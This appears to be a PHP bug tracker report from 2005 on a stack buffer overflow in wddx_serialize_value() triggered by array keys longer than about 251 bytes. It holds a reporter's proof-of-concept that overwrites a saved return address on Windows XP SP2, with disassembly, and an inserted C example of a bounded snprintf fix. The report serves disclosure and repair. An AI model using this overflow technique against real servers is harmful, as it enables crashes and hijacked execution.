ID:               34306
 User updated by:  dmitrysp at yandex dot ru
 Reported By:      dmitrysp at yandex dot ru
 Status:           Open
 Bug Type:         WDDX related
 Operating System: Windows XP sp2
 PHP Version:      5.1.0RC1
 New Comment:

What about you? Exploit example for Windows XP sp2:

$str='';
for ($i=1; $i<226; $i++) $str.=chr($i); // 251 or 256 > 230 bytes
$str.="\x49\x9B\xd7\x77"; // modify CALL return address from php_wddx_serialize_var()
$buf=wddx_serialize_value(array($str=>1), 'name');

77D79B49 - jump to Win API USER32.DisplayExitWindowsWarning function
(static address on some WinXP OS). Buffer overflow on sprintf(tmp_buf,
WDDX_VAR_S, name_esc) in wddx.c line 627.

101E089E            |. 50                 PUSH EAX
101E089F            |. 8D5424 38          LEA EDX,DWORD PTR SS:[ESP+38]
101E08A3            |. 68 B8592B10        PUSH php5ts.102B59B8         ;  ASCII "<var name='%s'>"
101E08A8            |. 52                 PUSH EDX
101E08A9            |. 894424 38          MOV DWORD PTR SS:[ESP+38],EAX
101E08AD            |. E8 FE4DEEFF        CALL php5ts.php_sprintf

This example "cleans up" the full stack downward:
$str='';
for ($i=1; $i<226; $i++) $str.=chr($i);
for ($i=1; $i<1000; $i++) $str.=chr(1);
$buf=wddx_serialize_value(array($str=>1), 'name');
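
The crash traced above comes from an unbounded sprintf() into a fixed-size stack buffer, so a name longer than the buffer overwrites the saved return address. The C program below is an added example (not code from PHP's wddx.c) showing the bounded replacement a maintainer would reach for: snprintf() with its return value checked, plus a helper that derives the longest name the buffer can hold. The 256-byte buffer size is an assumption for the example; the format string is the one quoted in the disassembly.

```c
#include <stdio.h>
#include <string.h>

/* Format string from the bug report; the buffer size below is an assumption
 * made for this example, not a value taken from wddx.c. */
#define WDDX_VAR_S   "<var name='%s'>"
#define TMP_BUF_LEN  256

/* Bounded replacement for sprintf(tmp_buf, WDDX_VAR_S, name): snprintf never
 * writes more than out_len bytes, and its return value says whether the
 * output was truncated. Returns the tag length, or -1 if it would not fit. */
int format_var_tag(char *out, size_t out_len, const char *name)
{
    int n = snprintf(out, out_len, WDDX_VAR_S, name);
    if (n < 0 || (size_t)n >= out_len) {
        if (out_len > 0) out[0] = '\0';   /* leave no partial tag behind */
        return -1;
    }
    return n;
}

/* Longest name that fits a buffer of out_len bytes: the format contributes
 * strlen(WDDX_VAR_S) - 2 literal bytes (the "%s" itself emits nothing) and
 * one byte is needed for the terminating NUL. */
size_t max_name_len(size_t out_len)
{
    size_t overhead = strlen(WDDX_VAR_S) - 2;
    return out_len > overhead ? out_len - overhead - 1 : 0;
}

/* Builds a constructed name of name_len 'A' bytes and reports whether
 * format_var_tag accepts it (1) or rejects it (0) for a TMP_BUF_LEN buffer. */
int name_fits(size_t name_len)
{
    char name[1024];
    char tmp_buf[TMP_BUF_LEN];
    if (name_len >= sizeof name) return 0;
    memset(name, 'A', name_len);
    name[name_len] = '\0';
    return format_var_tag(tmp_buf, sizeof tmp_buf, name) >= 0;
}

int main(void)
{
    size_t limit = max_name_len(TMP_BUF_LEN);
    printf("max name length for a %d-byte buffer: %zu\n", TMP_BUF_LEN, limit);
    printf("name of %zu bytes fits: %d\n", limit, name_fits(limit));
    printf("name of %zu bytes fits: %d\n", limit + 1, name_fits(limit + 1));
    return 0;
}
```

The point of checking the snprintf() return value rather than just capping the write is that a silently truncated tag would produce malformed WDDX; rejecting the oversized key lets the caller report an error instead of emitting corrupt output.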


Previous Comments:
------------------------------------------------------------------------

[2005-08-31 11:28:59] [EMAIL PROTECTED]

Correction: The max length is 251.

------------------------------------------------------------------------

[2005-08-31 11:27:10] [EMAIL PROTECTED]

Apparently the maximum array key length for wddx serializer is 254. It
doesn't matter what the content is.


------------------------------------------------------------------------

[2005-08-30 14:10:10] dmitrysp at yandex dot ru

Description:
------------
Apache2 crash.

Try Apache2 + PHP 5.1.0RC1, 
Apache2 + PHP 5.1.0-dev (built: Aug 30 2005 08:42:21), 
php.exe 4.3.0 console.

szAppName : Apache.exe     szAppVer : 2.0.54.0     szModName :
php5ts.dll     
szModVer : 5.1.0.0     offset : 001e144d     

Reproduce code:
---------------
    $str='';
    for ($i=1; $i<255; $i++) $str.=chr($i);
    $mix=array($str=>1);
    $buf=wddx_serialize_value($mix, 'name'); // apache crash here
    echo "ok";

------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=34306&edit=1